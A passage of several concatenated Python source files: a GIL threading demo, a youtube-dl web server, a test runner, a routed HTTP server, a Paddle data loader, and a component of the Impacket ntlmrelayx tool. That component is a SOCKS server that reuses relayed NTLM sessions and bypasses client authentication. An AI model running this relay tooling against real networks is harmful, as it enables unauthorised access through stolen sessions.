self.frame_queue.put((cur_frame, frame))
self.video_capture.release()
self.video_capture = None
|
perf.py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# perf.py
# A performance problem with threads
import dis # Disassembler for Python bytecode
import time
import threading
def count(n): # Consider this CPU-bound function
while n > 0:
n -= 1
print(dis.dis(count))
# Sequential Execution
start = time.time()
count(10000000)
count(10000000)
end = time.time()
print("Sequential", end-start)
# Threaded execution
start = time.time()
t1 = threading.Thread(target=count, args=(10000000,))
t2 = threading.Thread(target=count, args=(10000000,))
t1.start()
t2.start()
t1.join()
t2.join()
end = time.time()
print("Threaded ",end-start)
"""
Sequential 0.951080322265625
Threaded 0.9969501495361328
"""
|
socksserver.py | #!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SOCKS proxy server/client
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# A simple SOCKS server that proxy connection to relayed connections
#
# ToDo:
# [ ] Handle better the SOCKS specification (RFC1928), e.g. BIND
# [ ] Port handlers should be dynamically subscribed, and coded in another place. This will help coding
# proxies for different protocols (e.g. MSSQL)
import SocketServer
import socket
import time
import logging
from Queue import Queue
from struct import unpack, pack
from threading import Timer, Thread
from impacket import LOG
from impacket.dcerpc.v5.enum import Enum
from impacket.structure import Structure
# Amount of seconds each socks plugin keep alive function will be called
# It is up to each plugin to send the keep alive to the target or not in every hit.
# In some cases (e.g. SMB) it is not needed to send a keep alive every 30 secs.
KEEP_ALIVE_TIMER = 30.0
class enumItems(Enum):
NO_AUTHENTICATION = 0
GSSAPI = 1
USER_PASS = 2
UNACCEPTABLE = 0xFF
class replyField(Enum):
SUCCEEDED = 0
SOCKS_FAILURE = 1
NOT_ALLOWED = 2
NETWORK_UNREACHABLE = 3
HOST_UNREACHABLE = 4
CONNECTION_REFUSED = 5
TTL_EXPIRED = 6
COMMAND_NOT_SUPPORTED = 7
ADDRESS_NOT_SUPPORTED = 8
class ATYP(Enum):
IPv4 = 1
DOMAINNAME = 3
IPv6 = 4
class SOCKS5_GREETINGS(Structure):
structure = (
('VER','B=5'),
#('NMETHODS','B=0'),
('METHODS','B*B'),
)
class SOCKS5_GREETINGS_BACK(Structure):
structure = (
('VER','B=5'),
('METHODS','B=0'),
)
class SOCKS5_REQUEST(Structure):
structure = (
('VER','B=5'),
('CMD','B=0'),
('RSV','B=0'),
('ATYP','B=0'),
('PAYLOAD',':'),
)
class SOCKS5_REPLY(Structure):
structure = (
('VER','B=5'),
('REP','B=5'),
('RSV','B=0'),
('ATYP','B=1'),
('PAYLOAD',':="AAAAA"'),
)
class SOCKS4_REQUEST(Structure):
structure = (
('VER','B=4'),
('CMD','B=0'),
('PORT','>H=0'),
('ADDR','4s="'),
('PAYLOAD',':'),
)
class SOCKS4_REPLY(Structure):
structure = (
('VER','B=0'),
('REP','B=0x5A'),
('RSV','<H=0'),
('RSV','<L=0'),
)
activeConnections = Queue()
# Taken from https://stackoverflow.com/questions/474528/what-is-the-best-way-to-repeatedly-execute-a-function-every-x-seconds-in-python
# Thanks https://stackoverflow.com/users/624066/mestrelion
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.next_call = time.time()
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self.next_call += self.interval
self._timer = Timer(self.next_call - time.time(), self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
# Base class for Relay Socks Servers for different protocols (SMB, MSSQL, etc)
# Besides using this base class you need to define one global variable when
# writing a plugin for socksplugins:
# PLUGIN_CLASS = "<name of the class for the plugin>"
class SocksRelay:
PLUGIN_NAME = 'Base Plugin'
# The plugin scheme, for automatic registration with relay servers
# Should be specified in full caps, e.g. LDAP, HTTPS
PLUGIN_SCHEME = ''
def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
self.targetHost = targetHost
self.targetPort = targetPort
self.socksSocket = socksSocket
self.sessionData = activeRelays['data']
self.username = None
self.clientConnection = None
self.activeRelays = activeRelays
def initConnection(self):
# Here we do whatever is necessary to leave the relay ready for processing incoming connections
raise RuntimeError('Virtual Function')
def skipAuthentication(self):
# Charged of bypassing any authentication attempt from the client
raise RuntimeError('Virtual Function')
def tunnelConnection(self):
# Charged of tunneling the rest of the connection
raise RuntimeError('Virtual Function')
@staticmethod
def getProtocolPort(self):
# Should return the port this relay works against
raise RuntimeError('Virtual Function')
def keepAliveTimer(server):
LOG.debug('KeepAlive Timer reached. Updating connections')
for target in server.activeRelays.keys():
for port in server.activeRelays[target].keys():
# Now cycle through the users
for user in server.activeRelays[target][port].keys():
if user != 'data':
# Let's call the keepAlive method for the handler to keep the connection alive
if server.activeRelays[target][port][user]['inUse'] is False:
LOG.debug('Calling keepAlive() for %s@%s:%s' % (user, target, port))
try:
server.activeRelays[target][port][user]['protocolClient'].keepAlive()
except Exception, e:
LOG.debug('SOCKS: %s' % str(e))
if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >=0 or \
str(e).find('Invalid argument') >= 0 or str(e).find('Server not connected') >=0:
# Connection died, taking out of the active list
del (server.activeRelays[target][port][user])
if len(server.activeRelays[target][port].keys()) == 1:
del (server.activeRelays[target][port])
LOG.debug('Removing active relay for %s@%s:%s' % (user, target, port))
else:
LOG.debug('Skipping %s@%s:%s since it\'s being used at the moment' % (user, target, port))
def activeConnectionsWatcher(server):
while True:
# This call blocks until there is data, so it doesn't loop endlessly
target, port, userName, client, data = activeConnections.get()
# ToDo: Careful. Dicts are not thread safe right?
if server.activeRelays.has_key(target) is not True:
server.activeRelays[target] = {}
if server.activeRelays[target].has_key(port) is not True:
server.activeRelays[target][port] = {}
if server.activeRelays[target][port].has_key(userName) is not True:
LOG.info('SOCKS: Adding %s@%s(%s) to active SOCKS connection. Enjoy' % (userName, target, port))
server.activeRelays[target][port][userName] = {}
# This is the protocolClient. Needed because we need to access the killConnection from time to time.
# Inside this instance, you have the session attribute pointing to the relayed session.
server.activeRelays[target][port][userName]['protocolClient'] = client
server.activeRelays[target][port][userName]['inUse'] = False
server.activeRelays[target][port][userName]['data'] = data
# Just for the CHALLENGE data, we're storing this general
server.activeRelays[target][port]['data'] = data
else:
LOG.info('Relay connection for %s at %s(%d) already exists. Discarding' % (userName, target, port))
client.killConnection()
def webService(server):
from flask import Flask, jsonify
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def index():
print server.activeRelays
return "Relays available: %s!" % (len(server.activeRelays))
@app.route('/ntlmrelayx/api/v1.0/relays', methods=['GET'])
def get_relays():
relays = []
for target in server.activeRelays:
for port in server.activeRelays[target]:
for user in server.activeRelays[target][port]:
if user != 'data':
protocol = server.socksPlugins[port].PLUGIN_SCHEME
relays.append([protocol, target, user, str(port)])
return jsonify(relays)
@app.route('/ntlmrelayx/api/v1.0/relays', methods=['GET'])
def get_info(relay):
pass
app.run(host='0.0.0.0', port=9090)
class SocksRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.__socksServer = server
self.__ip, self.__port = client_address
self.__connSocket= request
self.__socksVersion = 5
self.targetHost = None
self.targetPort = None
self.__NBSession= None
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
def sendReplyError(self, error = replyField.CONNECTION_REFUSED):
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = error.value
else:
reply = SOCKS4_REPLY()
if error.value != 0:
reply['REP'] = 0x5B
return self.__connSocket.sendall(reply.getData())
def handle(self):
LOG.debug("SOCKS: New Connection from %s(%s)" % (self.__ip, self.__port))
data = self.__connSocket.recv(8192)
grettings = SOCKS5_GREETINGS_BACK(data)
self.__socksVersion = grettings['VER']
if self.__socksVersion == 5:
# We need to answer back with a no authentication response. We're not dealing with auth for now
self.__connSocket.sendall(str(SOCKS5_GREETINGS_BACK()))
data = self.__connSocket.recv(8192)
request = SOCKS5_REQUEST(data)
else:
# We're in version 4, we just received the request
request = SOCKS4_REQUEST(data)
# Let's process the request to extract the target to connect.
# SOCKS5
if self.__socksVersion == 5:
if request['ATYP'] == ATYP.IPv4.value:
self.targetHost = socket.inet_ntoa(request['PAYLOAD'][:4])
self.targetPort = unpack('>H',request['PAYLOAD'][4:])[0]
elif request['ATYP'] == ATYP.DOMAINNAME.value:
hostLength = unpack('!B',request['PAYLOAD'][0])[0]
self.targetHost = request['PAYLOAD'][1:hostLength+1]
self.targetPort = unpack('>H',request['PAYLOAD'][hostLength+1:])[0]
else:
LOG.error('No support for IPv6 yet!')
# SOCKS4
else:
self.targetPort = request['PORT']
# SOCKS4a
if request['ADDR'][:3] == "\x00\x00\x00" and request['ADDR'][3] != "\x00":
nullBytePos = request['PAYLOAD'].find("\x00");
if nullBytePos == -1:
LOG.error('Error while reading SOCKS4a header!')
else:
self.targetHost = request['PAYLOAD'].split('\0', 1)[1][:-1]
else:
self.targetHost = socket.inet_ntoa(request['ADDR'])
LOG.debug('SOCKS: Target is %s(%s)' % (self.targetHost, self.targetPort))
if self.targetPort != 53:
# Do we have an active connection for the target host/port asked?
# Still don't know the username, but it's a start
if self.__socksServer.activeRelays.has_key(self.targetHost):
if self.__socksServer.activeRelays[self.targetHost].has_key(self.targetPort) is not True:
LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
else:
LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
# Now let's get into the loops
if self.targetPort == 53:
# Somebody wanting a DNS request. Should we handle this?
s = socket.socket()
try:
LOG.debug('SOCKS: Connecting to %s(%s)' %(self.targetHost, self.targetPort))
s.connect((self.targetHost, self.targetPort))
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.error('SOCKS: %s' %str(e))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = replyField.SUCCEEDED.value
addr, port = s.getsockname()
reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
else:
reply = SOCKS4_REPLY()
self.__connSocket.sendall(reply.getData())
while True:
try:
data = self.__connSocket.recv(8192)
if data == '':
break
s.sendall(data)
data = s.recv(8192)
self.__connSocket.sendall(data)
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.error('SOCKS: ', str(e))
if self.__socksServer.socksPlugins.has_key(self.targetPort):
LOG.debug('Handler for port %s found %s' % (self.targetPort, self.__socksServer.socksPlugins[self.targetPort]))
relay = self.__socksServer.socksPlugins[self.targetPort](self.targetHost, self.targetPort, self.__connSocket,
self.__socksServer.activeRelays[self.targetHost][self.targetPort])
try:
relay.initConnection()
# Let's answer back saying we've got the connection. Data is fake
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = replyField.SUCCEEDED.value
addr, port = self.__connSocket.getsockname()
reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
else:
reply = SOCKS4_REPLY()
self.__connSocket.sendall(reply.getData())
if relay.skipAuthentication() is not True:
# Something didn't go right
# Close the socket
self.__connSocket.close()
return
# Ok, so we have a valid connection to play with. Let's lock it while we use it so the Timer doesn't send a
# keep alive to this one.
self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = True
relay.tunnelConnection()
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.debug('SOCKS: %s' % str(e))
if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >=0 or \
str(e).find('Invalid argument') >= 0:
# Connection died, taking out of the active list
del(self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username])
if len(self.__socksServer.activeRelays[self.targetHost][self.targetPort].keys()) == 1:
del(self.__socksServer.activeRelays[self.targetHost][self.targetPort])
LOG.debug('Removing active relay for %s@%s:%s' % (relay.username, self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
pass
# Freeing up this connection
if relay.username is not None:
self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = False
else:
LOG.error('SOCKS: I don\'t have a handler for this port')
LOG.debug('SOCKS: Shutting down connection')
try:
self.sendReplyError(replyField.CONNECTION_REFUSED)
except Exception, e:
LOG.debug('SOCKS END: %s' % str(e))
class SOCKS(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address=('0.0.0.0', 1080), handler_class=SocksRequestHandler):
LOG.info('SOCKS proxy started. Listening at port %d', server_address[1] )
self.activeRelays = {}
self.socksPlugins = {}
self.restAPI = None
self.activeConnectionsWatcher = None
self.supportedSchemes = []
SocketServer.TCPServer.allow_reuse_address = True
SocketServer.TCPServer.__init__(self, server_address, handler_class)
# Let's register the socksplugins plugins we have
from impacket.examples.ntlmrelayx.servers.socksplugins import SOCKS_RELAYS
for relay in SOCKS_RELAYS:
LOG.info('%s loaded..' % relay.PLUGIN_NAME)
self.socksPlugins[relay.getProtocolPort()] = relay
self.supportedSchemes.append(relay.PLUGIN_SCHEME)
# Let's create a timer to keep the connections up.
self.__timer = RepeatedTimer(KEEP_ALIVE_TIMER, keepAliveTimer, self)
# Let's start our RESTful API
self.restAPI = Thread(target=webService, args=(self, ))
self.restAPI.daemon = True
self.restAPI.start()
# Let's start out worker for active connections
self.activeConnectionsWatcher = Thread(target=activeConnectionsWatcher, args=(self, ))
self.activeConnectionsWatcher.daemon = True
self.activeConnectionsWatcher.start()
def shutdown(self):
self.__timer.stop()
del self.restAPI
del self.activeConnectionsWatcher
return SocketServer.TCPServer.shutdown(self)
if __name__ == '__main__':
from impacket.examples import logger
logger.init()
s = SOCKS()
s.serve_forever()
|
youtube-dl-server.py | import json
import subprocess
from queue import Queue
import io
import sys
from pathlib import Path
import re
from datetime import date
from bottle import run, Bottle, request, static_file, response, redirect, template, get
from threading import Thread
from bottle_websocket import GeventWebSocketServer
from bottle_websocket import websocket
from socket import error
import logging
logging.basicConfig(format="%(asctime)s [%(levelname)s] %(message)s")
L = logging.getLogger(__name__)
L.setLevel(logging.DEBUG)
class WSAddr:
def __init__(self):
self.wsClassVal = ""
import bottle
bottle.debug(True)
app = Bottle()
port = 8080
proxy = ""
WS = []
def send(msg):
for ws in WS.copy():
try:
L.debug("> " + msg)
ws.send(msg)
except error as e:
L.debug(f"> ws {ws} failed. Closing.")
if ws in WS:
WS.remove(ws)
def pcall(cmd):
send(f"Running {cmd}")
p = subprocess.run(cmd, capture_output=True, text=True, encoding="ASCII")
if p.returncode != 0:
msg = f"Error executing {cmd}\ncode:{p.returncode}\nout:{p.stdout}\nerr:{p.stderr}"
send(msg)
raise Exception(msg)
return p
@get("/download")
def dl_queue_list():
return template("./static/template/download.tpl")
_re_date = re.compile("(\d\d\d\d\-\d\d-\d\d).*")
@get("/")
@get("/gallery")
def gallery():
VIDEO_EXT = {".mkv", ".webm", ".mp4"}
paths = [
p
for p in Path("./videos").glob("**/*")
if (p.suffix in VIDEO_EXT) and (not p.name.startswith("."))
]
def key(p):
m = _re_date.match(p.name)
if m:
return p.name
else:
return "0000-00-00"
paths = sorted(paths, reverse=True, key=key)
videos = [{"name": p.name, "src": "/video/" + "/".join(p.parts[1:])} for p in paths]
return template("./static/template/gallery.tpl", {"videos": videos})
@get("/video/<filepath:path>")
def video(filepath):
return static_file(filepath, root="./videos")
@get("/websocket", apply=[websocket])
def echo(ws):
L.debug(f"New WebSocket {ws} total={len(WS)}")
WS.append(ws)
# need to receive once so socket gets not closed
L.debug(ws.receive())
ws.send(f"Downloads queued {dl_q.qsize()}\n")
@get("/youtube-dl/static/<filepath:path>")
def server_static(filepath):
return static_file(filepath, root="./static")
@get("/youtube-dl/q", method="GET")
def q_size():
return {"success": True, "size": json.dumps(list(dl_q.queue))}
@get("/youtube-dl/q", method="POST")
def q_put():
url = request.json.get("url")
av = request.json.get("av")
if "" != url:
req = {"url": url, "av": av}
dl_q.put(req)
send(f"Queued {url}. Total={dl_q.qsize()}")
if Thr.dl_thread.is_alive() == False:
thr = Thr()
thr.restart()
return {"success": True, "msg": f"Queued download {url}"}
else:
return {"success": False, "msg": "Failed"}
def dl_worker():
L.info("Worker starting")
while not done:
item = dl_q.get()
download(item)
dl_q.task_done()
def download(req):
today = date.today().isoformat()
url = req["url"]
av = req["av"]
generate_thumbnail = True
send(f"Starting download of {url}")
if av == "A": # audio only
cmd = [
"youtube-dl",
"--no-progress",
"--restrict-filenames",
"--format",
"bestaudio",
"-o",
f"./downloads/{today} %(title)s via %(uploader)s.audio.%(ext)s",
"--extract-audio",
"--audio-format",
"mp3",
url,
]
generate_thumbnail = False
else:
cmd = [
"youtube-dl",
"--no-progress",
"--restrict-filenames",
"--format",
"bestvideo[height<=760]+bestaudio",
# Often sensible video and audio streams are only available separately,
# so we need to merge the resulting file. Recoding a video to mp4
# with A+V can take a lot of time, so we opt for an open container format:
# Option A: Recode Video
# "--recode-video", "mp4",
# "--postprocessor-args", "-strict experimental", # allow use of mp4 encoder
# Option B: Use container format
# "--merge-output-format", "webm",
"-o",
f"./downloads/{today} %(title)s via %(uploader)s.%(ext)s",
url,
# "--verbose",
]
send("[youtube-dl] " + " ".join(cmd))
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in proc.stdout:
send("[youtube-dl] " + line.decode("ASCII").rstrip("\n"))
code = proc.wait()
proc.stdout.close()
try:
if code == 0:
send("[Finished] " + url + ". Remaining: " + json.dumps(dl_q.qsize()))
else:
send("[Failed] " + url)
return
except error as e:
L.error(e)
send("[Failed]" + str(e))
return
if generate_thumbnail:
p = pcall(cmd + ["--get-filename"])
fn = p.stdout.rstrip("\n")
# The filename is not actually accurate. The extension might be wrongly detected.
# Let's glob this:
fn = str(list(Path(".").glob(str(Path(fn).with_suffix("")) + "*"))[0])
p = pcall(
[
"ffmpeg",
"-y",
"-i",
fn,
"-ss",
"00:00:20.000",
"-vframes",
"1",
fn + ".png",
]
)
send("Done.")
class Thr:
def __init__(self):
self.dl_thread = ""
def restart(self):
self.dl_thread = Thread(target=dl_worker)
self.dl_thread.start()
dl_q = Queue()
done = False
Thr.dl_thread = Thread(target=dl_worker)
Thr.dl_thread.start()
run(host="0.0.0.0", port=port, server=GeventWebSocketServer, reloader=True)
done = True
Thr.dl_thread.join()
|
run_tests.py | #!/usr/bin/python
import multiprocessing
import optparse
import StringIO
import sys
import time
import warnings
# Install the Python unittest2 package before you run this script.
import unittest2
USAGE = """%prog -s SDK_PATH -t TEST_PATTERN
Run unit tests for App Engine apps.
The SDK Path is probably /usr/local/google_appengine on Mac OS
SDK_PATH Path to the SDK installation"""
def start_suite(suite, queue):
sio = StringIO.StringIO()
testresult = unittest2.TextTestRunner(sio, verbosity=2).run(suite)
queue.put((sio.getvalue(), testresult.testsRun, testresult.wasSuccessful()))
def main(sdk_path, test_pattern):
start_time = time.time()
sys.path.insert(0, sdk_path)
import dev_appserver
dev_appserver.fix_sys_path()
suites = unittest2.loader.TestLoader().discover("tests", test_pattern)
processes = []
result_queue = multiprocessing.Queue()
for suite in suites:
process = multiprocessing.Process(target=start_suite, args=[suite, result_queue])
process.start()
processes.append(process)
for process in processes:
process.join()
fail = False
total_tests_run = 0
while not result_queue.empty():
test_output, tests_run, was_successful = result_queue.get()
total_tests_run += tests_run
print '-----------------------'
print test_output
if not was_successful:
fail = True
print "================================"
print "Completed {} tests in: {} seconds".format(total_tests_run, time.time() - start_time)
if fail:
print "TESTS FAILED!"
else:
print "TESTS PASSED!"
print "================================"
if fail:
sys.exit(1)
else:
sys.exit(0)
if __name__ == '__main__':
parser = optparse.OptionParser(USAGE)
parser.add_option("-s", "--sdk_path", type="string", default="/usr/local/google_appengine",
help="path to load Google Appengine SDK from")
parser.add_option("-t", "--test_pattern", type="string", default="test*.py",
help="pattern for tests to run")
options, args = parser.parse_args()
main(options.sdk_path, options.test_pattern)
|
http_server.py | import os
import posixpath
import urllib
import threading
from pkg_resources import resource_filename
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
BASE = resource_filename('globeplot', '')
# ROOT = os.path.join(os.path.split(BASE)[0], 'webgl_globe')
ROOT = os.path.join(BASE, 'webgl_globe')
# modify this to add additional routes
ROUTES = (
# [url_prefix , directory_path],
['', ROOT], # empty string for the 'default' match
)
class RequestHandler(SimpleHTTPRequestHandler):
"""
Adapted from:
https://www.huyng.com/posts/modifying-python-simplehttpserver
"""
def translate_path(self, path):
"""translate path given routes"""
# set default root to cwd
root = os.getcwd()
# look up routes and set root directory accordingly
for pattern, rootdir in ROUTES:
if path.startswith(pattern):
# found match!
path = path[len(pattern):] # consume path up to pattern len
root = rootdir
break
# normalize path and prepend root directory
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
class GlobePlotServer(object):
"""
Adapted from http://stackoverflow.com/a/19578604
"""
server = None
keep_alive = 4 # the webserver is only up for 4 seconds
def __init__(self):
if not GlobePlotServer.server:
GlobePlotServer.server = HTTPServer(('localhost', 8000), RequestHandler)
self.thread = threading.Thread(target=GlobePlotServer.server.serve_forever)
self.thread.daemon = True
def __enter__(self):
if GlobePlotServer.server:
self.up()
return self
def __exit__(self, exc_type, exc_value, traceback):
# http://stackoverflow.com/questions/865115/how-do-i-correctly-clean-up-a-python-object
self.down()
def up(self):
if GlobePlotServer.server and self.thread:
self.thread.start()
print('Starting server on port {}'.format(GlobePlotServer.server.server_port))
else:
print('Server already running on port {}'.format(0))
GlobePlotServer.keep_alive = 4
def down(self):
if GlobePlotServer.server:
# This is currently necessary to give the webserver time enough
# to serve the page...
# TODO: Figure out how to improve this
print('Will stop server in {} seconds'.format(GlobePlotServer.keep_alive))
import time
time.sleep(GlobePlotServer.keep_alive)
GlobePlotServer.server.shutdown()
print('Stopping server on port {}'.format(GlobePlotServer.server.server_port))
GlobePlotServer.server = None
|
dataloader_iter.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import CleanupFuncRegistrar, _cleanup_mmap, _set_SIGCHLD_handler
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
__all__ = ['get_worker_info']
# multi-process worker check indices queue interval, avoid
# hanging in subprocess data loading
MP_INDICES_CHECK_INTERVAL = 5
_IterableDatasetStopIteration = namedtuple('_IterableDatasetStopIteration',
['worker_id'])
def default_collate_fn(batch):
"""
Default batch collating function for :code:`fluid.io.DataLoader`,
batch should be a list of samples, and each sample should be a list
of fields as follows:
[[filed1, filed2, ...], [filed1, filed2, ...], ...]
This default collate function zipped each filed together and stack
each filed as the batch field as follows:
[batch_filed1, batch_filed2, ...]
Args:
batch(list of list of numpy array): the batch data, each fields
should be a numpy array, each sample should be a list of
fileds, and batch should be a list of sample.
Returns:
a list of numpy array: collated batch
"""
sample = batch[0]
# dataset has only 1 field
if isinstance(sample, np.ndarray):
return [np.stack(batch, axis=0)]
# batch each field
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
outputs = []
for slot in slots:
if isinstance(slot[0], (np.ndarray, np.bool, numbers.Number)):
tmp = np.stack(slot, axis=0)
outputs.append(tmp)
elif isinstance(slot[0], paddle.Tensor):
tmp = layers.stack(slot, axis=0)
outputs.append(tmp)
else:
raise RuntimeError("Unknown data type {}".format(type(slot[0])))
return outputs
class _DatasetKind(object):
MAP = 0
ITER = 1
@staticmethod
def create_fetcher(kind, dataset, collate_fn, drop_last):
if kind == _DatasetKind.MAP:
return _MapDatasetFetcher(dataset, collate_fn, drop_last)
elif kind == _DatasetKind.ITER:
return _IterableDatasetFetcher(dataset, collate_fn, drop_last)
else:
raise NotImplementedError("unknown Dataset kind {}".format(kind))
class ParentWatchDog(object):
def __init__(self):
self._parent_pid = os.getppid()
self._parent_alive = True
def is_alive(self):
if self._parent_alive:
self._parent_alive = os.getppid() == self._parent_pid
return self._parent_alive
# worker information for each workers, used for splitting data copy
# for IteratorDataset in worker processes.
_worker_info = None
def get_worker_info():
"""
Get DataLoader worker process information function, this function is
used to split data copy in worker process for IterableDataset
(see :code:`paddle.io.IterableDataset`), worker information contains
following fields:
:attr:`num_workers`: total worker process number, see `paddle.io.DataLoader`
:attr:`id`: the worker processs id, count from 0 to :attr:`num_workers - 1`
:attr:`dataset`: the dataset object in this worker process
Returns:
WorkerInfo: an instance of WorkerInfo which contains fields above.
.. note::
For mode usage and exampls, please see :code:`paddle.io.IterableDataset`
Example:
.. code-block:: python
import math
import numpy as np
import paddle.fluid as fluid
from paddle.io import IterableDataset, DataLoader, get_worker_info
class SplitedIterableDataset(IterableDataset):
def __init__(self, start, end):
self.start = start
self.end = end
def __iter__(self):
worker_info = get_worker_info()
if worker_info is None:
iter_start = self.start
iter_end = self.end
else:
per_worker = int(
math.ceil((self.end - self.start) / float(
worker_info.num_workers)))
worker_id = worker_info.id
iter_start = self.start + worker_id * per_worker
iter_end = min(iter_start + per_worker, self.end)
for i in range(iter_start, iter_end):
yield np.array([i])
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
dataset = SplitedIterableDataset(start=2, end=9)
dataloader = DataLoader(
dataset,
places=place,
num_workers=2,
batch_size=1,
drop_last=True)
print(list(dataloader))
# outputs: [2, 5, 3, 6, 4, 7]
"""
return _worker_info
class WorkerInfo(object):
__initialized = False
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
self.__initialized = True
def __setattr__(self, key, val):
if self.__initialized:
raise RuntimeError("Cannot assign attributes to {} objects".format(
self.__class__.__name__))
return super(WorkerInfo, self).__setattr__(key, val)
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or default_collate_fn
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_INDICES_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._collate_fn, True)
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _thread_loop(self):
try:
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if not isinstance(slot, core.LoDTensor):
self._check_input_array(slot)
# FIXME(dkp): blocking_queue only support
# core.LoDTensorArray as input now, read
# numpy data into a LoDTensorArray here,
# should support paddle.Tensor list later
if isinstance(slot, paddle.Tensor):
slot = slot.numpy()
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except StopIteration:
self._blocking_queue.close()
except Exception:
self._blocking_queue.kill()
self._thread = None
